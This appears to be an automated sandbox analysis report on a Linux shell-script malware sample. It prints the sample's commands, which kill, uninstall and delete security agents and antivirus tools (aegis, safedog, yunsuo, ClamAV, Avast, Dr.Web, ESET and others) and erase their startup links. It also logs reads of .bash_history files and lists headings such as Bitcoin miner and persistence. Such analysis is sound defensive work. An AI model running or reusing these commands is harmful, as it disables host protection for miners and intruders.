Source: 1EC6U55yrZ	safedog: rm -f /etc/safedog/sdcc/script/udboot >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /etc/safedog/sdcc/bin/udcenter >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /etc/safedog/sdcc/bin/udpro >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /etc/safedog/sdcc/bin/sdalarm >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /etc/safedog/server/script/sdsetos >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /etc/safedog/script/safedog_uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ	aegis: "aegis" )
Source: 1EC6U55yrZ	aegis: killall -9 aegis_cli >/dev/null 2>&1
Source: 1EC6U55yrZ	aegis: killall -9 aegis_update >/dev/null 2>&1
Source: 1EC6U55yrZ	aegis: /etc/init.d/aegis stop >/dev/null 2>&1
Source: 1EC6U55yrZ	aegis: /etc/init.d/aegis uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ	aegis: rm -f /etc/init.d/aegis
Source: 1EC6U55yrZ	aegis: rc-update del aegis default 2>/dev/null
Source: 1EC6U55yrZ	aegis: rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc2.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc3.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc4.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc5.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc.d/rc2.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc.d/rc3.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc.d/rc4.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -f "/etc/rc.d/rc5.d/S80aegis"
Source: 1EC6U55yrZ	aegis: rm -rf /usr/local/aegis/aegis_client
Source: 1EC6U55yrZ	aegis: rm -rf /usr/local/aegis/aegis_update
Source: 1EC6U55yrZ	aegis: rm -rf /usr/local/aegis/alihids
Source: 1EC6U55yrZ	yunsuo: "yunsuo" )
Source: 1EC6U55yrZ	yunsuo: service yunsuo stop >/dev/null 2>&1
Source: 1EC6U55yrZ	yunsuo: /etc/init.d/yunsuo stop >/dev/null 2>&1
Source: 1EC6U55yrZ	yunsuo: rm -f /etc/init.d/yunsuo
Source: 1EC6U55yrZ	yunsuo: echo y \| /usr/local/yunsuo_agent/uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ	clamd: "clamd" )
Source: 1EC6U55yrZ	clamd: service clamd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	clamd: /etc/init.d/clamd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	clamav: yum -y remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZ	clamav: dpkg -remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZ	clamav: dpkg --remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZ	clamav: dpkg -remove `dpkg -l \| grep clamav \| awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ	clamav: dpkg --remove `dpkg -l \| grep clamav \| awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: "avast" )
Source: 1EC6U55yrZ	avast: service avast stop >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: /etc/init.d/avast stop >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: rpm -e avast >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: dpkg -remove avast * >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: dpkg --remove avast * >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: dpkg -remove `dpkg -l \| grep avast \| awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ	avast: dpkg --remove `dpkg -l \| grep avast \| awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ	avgd: "avgd" )
Source: 1EC6U55yrZ	avgd: service avgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	avgd: /etc/init.d/avgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	avgd: rpm -e avgd >/dev/null 2>&1
Source: 1EC6U55yrZ	cmdavd: "cmdavd" )
Source: 1EC6U55yrZ	cmdavd: service cmdavd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	cmdmgd: service cmdmgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	cmdavd: /etc/init.d/cmdavd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	cmdmgd: /etc/init.d/cmdmgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	cmdmgd: "cmdmgd" )
Source: 1EC6U55yrZ	drweb-configd: "drweb-configd" )
Source: 1EC6U55yrZ	drweb-spider-kmod: service drweb-spider-kmod stop >/dev/null 2>&1
Source: 1EC6U55yrZ	drweb-configd: service drweb-configd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	drweb-spider-kmod: /etc/init.d/drweb-spider-kmod stop >/dev/null 2>&1
Source: 1EC6U55yrZ	drweb-configd: /etc/init.d/drweb-configd stop >/dev/null 2>&1
Source: 1EC6U55yrZ	drweb-spider-kmod: "drweb-spider-kmod" )
Source: 1EC6U55yrZ	esets: "esets" )
Source: 1EC6U55yrZ	esets: service esets stop >/dev/null 2>&1
Source: 1EC6U55yrZ	esets: /etc/init.d/esets stop >/dev/null 2>&1
Source: 1EC6U55yrZ	xmirrord: "xmirrord" )
Source: 1EC6U55yrZ	xmirrord: service xmirrord stop >/dev/null 2>&1
Source: 1EC6U55yrZ	xmirrord: /etc/init.d/xmirrord stop >/dev/null 2>&1

Stealing of Sensitive Information:

Sample reads from .bash_history

Show sources

Source: /bin/cat (PID: 21815)	File: /root/.bash_history
Source: /bin/cat (PID: 21831)	File: /home/user/.bash_history
Source: /bin/cat (PID: 21842)	File: /home/user/.bash_history
Source: /bin/cat (PID: 21865)	File: /home/user/.bash_history
Source: /bin/cat (PID: 21886)	File: /root/.bash_history
Source: /bin/cat (PID: 21908)	File: /root/.bash_history

Runtime Messages

Command:	bash "/tmp/1EC6U55yrZ"
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1EC6U55yrZ

Overview

General Information

Detection

Classification

Mitre Att&ck Matrix

Signature Overview

Bitcoin Miner:

Spreading:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Runtime Messages

Behavior Graph